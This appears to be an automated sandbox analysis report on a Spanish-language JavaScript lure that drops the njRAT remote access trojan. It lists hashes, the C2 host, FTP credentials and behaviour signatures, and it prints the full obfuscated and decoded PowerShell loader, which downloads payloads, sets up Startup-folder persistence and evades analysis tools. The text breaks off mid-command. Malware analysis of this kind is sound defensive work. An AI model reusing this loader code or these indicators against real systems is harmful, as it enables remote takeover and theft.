Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-12-2024 15:59

General

  • Target

    06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js

  • Size

    195KB

  • MD5

    6675b77a4e527883e0cd36a107269299

  • SHA1

    48b54aab7672ff52328632c110c7b14207f91832

  • SHA256

    cb8afa9d1cab7e87066a992f5954e223720e39064d6d9f425a5e85a13e6a9b3a

  • SHA512

    b4182d413aa3b8133c72a61a3b2136f6a61a4ce0a6f054d40329a00c897140003046ec34fce3dea5de6c88a491b3a920744cb48fb69b6c4f0c70f5bbc6f79046

  • SSDEEP

    3072:lW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+CWXt+NWXt+NWXt+NWXt+NWXt+NWXC:G

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    fYudY1578@@@@@@

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

hugolganador.duckdns.org:5250

Mutex

f07d2cf4921a47eb98

Attributes
  • reg_key

    f07d2cf4921a47eb98

  • splitter

    @!#&^%$

Signatures

  • Njrat family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 10 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nKvfY = 'JA' + [char]66 + 'jAEkATw' + [char]66 + 'lAEMAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAYw' + [char]66 + 'JAE8AZQ' + [char]66 + 'DACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAKQAgAHsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAKAAkAHEAdg' + [char]66 + 'qAGoAZgAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHEAdg' + [char]66 + 'qAGoAZgAgAD0AIAAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAFUAdw' + [char]66 + 'mAHcAWgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAVQ' + [char]66 + '3AGYAdw' + [char]66 + 'aACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAcQ' + [char]66 + 'iAHMAcQ' + [char]66 + 'zACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAEwAUQ' + [char]66 + 'RAEEAQgAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAEwAUQ' + [char]66 + 'RAEEAQgAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'xAGIAcw' + [char]66 + 'xAHMAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASg' + [char]66 + '1AGsAcA' + [char]66 + 'WACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAGEAZQ' + [char]66 + 'EAHcAVQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'GAHkAZg' + [char]66 + 'kAHoAIAApAC4AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lADIANgAyADIAZQ' + [char]66 + 'iADkANAA5ADUAOQAtADgANAA4AGIALQ' + [char]66 + 'lADUAYwA0AC0AMAA0AGQAYwAtAGUANwAyAGUANAAyADkAZAA9AG4AZQ' + [char]66 + 'rAG8AdAAmAGEAaQ' + [char]66 + 'kAGUAbQA9AHQAbA' + [char]66 + 'hAD8AdA' + [char]66 + '4AHQALg' + [char]66 + 'sAG8AZw' + [char]66 + '1AGgALw' + [char]66 + 'vAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AG8AcA' + [char]66 + 'zAHAAcA' + [char]66 + 'hAC4AOA' + [char]66 + 'lADcAZQA4AC0Acw' + [char]66 + 'vAGkAcg' + [char]66 + 'hAG4Abw' + [char]66 + 'sAGwAbw' + [char]66 + 'tAC8AYgAvADAAdgAvAG0Abw' + [char]66 + 'jAC4Acw' + [char]66 + 'pAHAAYQ' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAZw' + [char]66 + 'hAHIAbw' + [char]66 + '0AHMAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'lAHIAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQASQ' + [char]66 + 'uAHMAdA' + [char]66 + 'hAGwAbA' + [char]66 + 'VAHQAaQ' + [char]66 + 'sACcAJwAgACAAKQAgACkAOwAnADsAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADMALg' + [char]66 + 'wAHMAMQAnACkAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sACAALQ' + [char]66 + 'FAHgAZQ' + [char]66 + 'jAHUAdA' + [char]66 + 'pAG8Abg' + [char]66 + 'QAG8AbA' + [char]66 + 'pAGMAeQAgAEIAeQ' + [char]66 + 'wAGEAcw' + [char]66 + 'zACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA7AH0AOwA=';$nKvfY = $nKvfY.replace('革','B') ;$nKvfY = [System.Convert]::FromBase64String( $nKvfY ) ;;;$nKvfY = [System.Text.Encoding]::Unicode.GetString( $nKvfY ) ;$nKvfY = $nKvfY.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js') ;powershell $nKvfY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$cIOeC = $host.Version.Major.Equals(2);If ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$qvjjf = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $Xumfi ) {$qvjjf = ($qvjjf + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$qvjjf = ($qvjjf + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$xxwtl = ( New-Object Net.WebClient ) ;$xxwtl.Encoding = [System.Text.Encoding]::UTF8 ;$xxwtl.DownloadFile($qvjjf, ($HzOMj + '\Upwin.msu') ) ;$UwfwZ = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$qbsqs = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $qbsqs ) ;$RVUXv | Out-File -FilePath 